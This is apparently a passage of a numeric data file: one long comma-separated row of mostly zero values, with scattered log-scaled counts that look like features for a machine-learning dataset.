0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.567740402508133, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 1.3862943611198906, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 5.991464547107983, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 5.030437921392435, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 1.7412592803704001, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 5.346437018291705, 0.0, 0.0, 0.0, 1.6094379124341003, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0, 0, 0, 0.0, 1.0986122886681098, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 